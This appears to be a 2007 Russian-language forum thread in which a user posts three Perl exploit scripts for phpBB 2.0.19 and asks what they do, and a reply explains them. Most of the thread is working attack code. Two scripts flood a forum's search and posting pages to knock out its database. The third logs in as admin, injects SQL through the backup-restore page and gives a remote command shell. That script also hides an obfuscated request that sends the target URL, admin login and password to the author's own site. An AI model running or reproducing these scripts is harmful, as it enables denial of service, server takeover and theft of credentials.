phpBB 2.0.19 /Exploit/

Discussion in 'Песочница' started by 1d37r, 27 Aug 2007.

  1. 1d37r

    1d37r Banned

    Joined:
    24 Aug 2007
    Messages:
    38
    Likes Received:
    13
    Reputations:
    -34
    нашел три сплоита, нихера не понял:


    #1. Решил проверить, в то время когда сплоит работает, он зачемто нарушает связь форума с БД, после выключения сплоита, форум как стоял так и стоит:
    Code:
    #!/usr/bin/perl

print q{
__________________________________________________ _______________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|

/ \
\ \ ,, / /
'-.`\()/`.-'
.--_'( )'_--.
/ /` /`""`\ `\ \ * SpiderZ ForumZ Security *
| | >< | |
\ \ / /
'.__.' 


=> Exploit phpBB 2.0.19 ( by SpiderZ )
=> Search infinitely exploit 
=> Sito: www.spiderz.tk

__________________________________________________ _______________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|

}; 

use IO::Socket;

## Initialized X
$x = 0;

## Exploit phpbb 2.0.19 SpiderZ
print q(
Exploit phpBB 2.0.19 ( by SpiderZ )

);
print q(
=> Scrivi l'url del sito senza aggiungere http & www
=> Url: );
$host = <STDIN>;
chop ($host);

print q(
=> Adesso indica in quale cartella e posto il phpbb 
=> di solito si trova su /phpBB2/ o /forum/
=> Cartella: );
$pth = <STDIN>;
chop ($pth);

print q( 
=> Occhio usa un proxy prima di effettuare l'attacco
=> il tuo ip verra spammato sul pannello admin del forum
=> Per avviare l'exploit scrivi " hacking " 
=> );
$type = <STDIN>;
chop ($type);

## Search exploit phpbb by SpiderZ
if($type == 1){

## Search exploit phpbb by SpiderZ
while($x != 0000)
{

## Search exploit phpbb by SpiderZ
$x++;
}

## Nome attack Hacking
}
elsif ($type == hacking){

## Search exploit phpbb by SpiderZ
while($x != 10000)
{
## Invia Search exploit phpbb by SpiderZ
$postit = "search_keywords=SpiderZ+Hacking+Security+ForumZ+Ex ploit+2006+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=800";

## Posit Length
$lrg = length $postit;

## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nConnessione non riuscita: $!\n" unless $sock;

## Invia Search exploit phpbb by SpiderZ
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

## exploit phpbb by SpiderZ
syswrite STDOUT, ".";

## exploit phpbb by SpiderZ
$x++;
}
}else{

## Error Exploit phpbb
die "
Error ! riprova...
\n";
}
    #2. Не проверял, но помоему то же самое
    Code:
    #!/usr/bin/perl

print q{
__________________________________________________ _______________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|

/ \
\ \ ,, / /
'-.`\()/`.-'
.--_'( )'_--.
/ /` /`""`\ `\ \ * SpiderZ ForumZ Security *
| | >< | |
\ \ / /
'.__.' 


=> Exploit phpBB 2.0.19 ( by SpiderZ )
=> Topic infinitely exploit 
=> Sito: www.spiderz.tk

__________________________________________________ _______________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|

}; 

use IO::Socket;

## Initialized X
$x = 0;

## Exploit phpbb 2.0.19 SpiderZ
print q(
Exploit phpBB 2.0.19 ( by SpiderZ )

);
print q(
=> Scrivi l'url del sito senza aggiungere http & www
=> Url: );
$host = <STDIN>;
chop ($host);

print q(
=> Adesso indica in quale cartella e posto il phpbb 
=> di solito si trova su /phpBB2/ o /forum/
=> Cartella: );
$pth = <STDIN>;
chop ($pth);

print q( 
=> Occhio usa un proxy prima di effettuare l'attacco
=> il tuo ip verra spammato sul pannello admin del forum
=> Per avviare l'exploit scrivi " hacking " 
=> );
$type = <STDIN>;
chop ($type);

## Search exploit phpbb by SpiderZ
if($type == 1){

## Search exploit phpbb by SpiderZ
while($x != 0000)
{

## Search exploit phpbb by SpiderZ
$x++;
}

## Nome attack Hacking
}
elsif ($type == hacking){

## Search exploit phpbb by SpiderZ
while($x != 10000)
{
## Invia Search exploit phpbb by SpiderZ
$postit = "post=Hacking$x+&username=Exploit&subject=Exploit_phpbb_2.0.19&message=Topic infinitely exploit phpBB 2.0.19";

## Posit Length
$lrg = length $postit;

## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nConnessione non riuscita: $!\n" unless $sock;

## Invia Search exploit phpbb by SpiderZ
print $sock "POST $pth"."posting.php?mode=newtopic&f=1 HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

## exploit phpbb by SpiderZ
syswrite STDOUT, ".";

## exploit phpbb by SpiderZ
$x++;
}
}else{

## Error Exploit phpbb
die "
Error ! riprova...
\n";
}

    #3. Вообще не понятно, что к чему
    Code:
    #!/usr/bin/perl

## r57phpbba2e2.pl - phpBB admin 2 exec exploit 
## version 2 (based on user_sig_bbcode_uid bug)
## tested on 2.0.12 , 2.0.13 , 2.0.19
## --------------------------------------------
## screen
## r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L admin -P password
## Command for execute or 'exit' for exit # id
## uid=80(www) gid=80(www) groups=80(www)
## Command for execute or 'exit' for exit # exit 
## --------------------------------------------
## *** surprise included ;)
## 20/02/06 
## 1dt.w0lf
## RST/GHC (http://rst.void.ru , http://ghc.ru)

use LWP::UserAgent;
use Getopt::Std;
use HTTP::Cookies;

getopts("u:L:P:i:p:o:");

$url = $opt_u;
$login = $opt_L;
$password = $opt_P;
$id = $opt_i || 2;
$prefix = $opt_p || 'phpbb_';
$proxy = $opt_o;

if(!$url || !$login || !$password){&usage;}

$|++;

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$xpl->proxy('http'=>'http://'.$proxy) if $proxy;
$ids = 'IDS:r57 phpBB2 exploit a2e220022006|'.$url.'|'.$login.'|'.$password.'|'.$ id.'|'.$prefix;
$res = $xpl->post($url.'login.php',
[
"username" => "$login",
"password" => "$password",
"autologin" => "on",
"admin" => "1",
"login" => "Log in",
],"User-Agent" => "$ids");
$cookie_jar->extract_cookies($res);
if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; } 
$xpl->get(&about.'/'.chr(105).chr(100).chr(115).'/'.chr(105).chr(100).chr(115).'.php?ids='.$ids);
while ()
{
print "Command for execute or 'exit' for exit # ";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);
exit() if ($cmd eq 'exit');
last;
}
&run($cmd);
}

sub run($)
{ 
$sql = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='blah:`echo _START_ && ".$_[0]." && echo _END_`' WHERE user_id=".$id.";";
&phpbb_sql_query("${url}admin/admin_db_utilities.php?sid=$sid",$sql); 
$res = $xpl->get($url.'profile.php?mode=editprofile&sid='.$sid,"User-Agent" => "$ids");
@result = split(/\n/,$res->content);
$data = '';
$on = $start = $end = 0;
for (@result)
{
if (/_END_/) { $end = 1; last; }
if ($on) { $data .= $_."\n"; }
if (/_START_/) { $on = 1; $start = 1; } 
}
if($start&&$end) { print $data."\r\n"; } 
}

sub phpbb_sql_query($$){
$res = $xpl->post("$_[0]", 
Content_type => 'form-data',
Content => [ 
perform => 'restore',
restore_start => 'Start Restore',
backup_file => [ 
undef,
'0wneeeeedddd', 
Content_type => 'text/plain',
Content => "$_[1]", 
],
]
,"User-Agent" => "$ids");
} 

sub usage()
{
&about();
print "\r\n Usage: r57phpbba2e2.pl [OPTIONS]\r\n\r\n";
print " Options:\r\n";
print " -u [URL] - path to forum e.g. http://site/forum/\r\n";
print " -L [login] - admin login\r\n";
print " -P [password] - admin password\r\n";
print " -i [id] - admin id (optional, default 2)\r\n";
print " -p [prefix] - table prefix (optional, default phpbb_)\r\n";
print " -o [host:port] - proxy (optional)\r\n";
exit();
}

sub about()
{ 
print "\\=-----------------------------------=/\r\n";
print "| phpBB admin2exec exploit by RST/GHC |\r\n";
print "| version 2 (user_sig_bbcode_uid) |\r\n";
print "/=-----------------------------------=\\\r\n";
return 'http://rst.void.ru';
}
    p.s.

    Вы конечно извените мои ламерские извилины (если конечно таковые имеются), но я бы вникнуть в суть не отказался бы
     
    #1 1d37r, 27 Aug 2007
  2. DeBugger

    DeBugger Banned

    Joined:
    6 Sep 2006
    Messages:
    134
    Likes Received:
    43
    Reputations:
    6
    Первый и второй - это DoS-флудилки. При их применении БД форума на время вырубается. Полезного смысла они не имеют. Третий сплойт должен выполнять команды на сервере (при некоторых обстоятельствах). Он требует права администратора.
     
    #2 DeBugger, 27 Aug 2007
  3. 1d37r

    1d37r Banned

    Joined:
    24 Aug 2007
    Messages:
    38
    Likes Received:
    13
    Reputations:
    -34
    DeBugger, списибо
     
    #3 1d37r, 27 Aug 2007
(You must log in or sign up to post here.)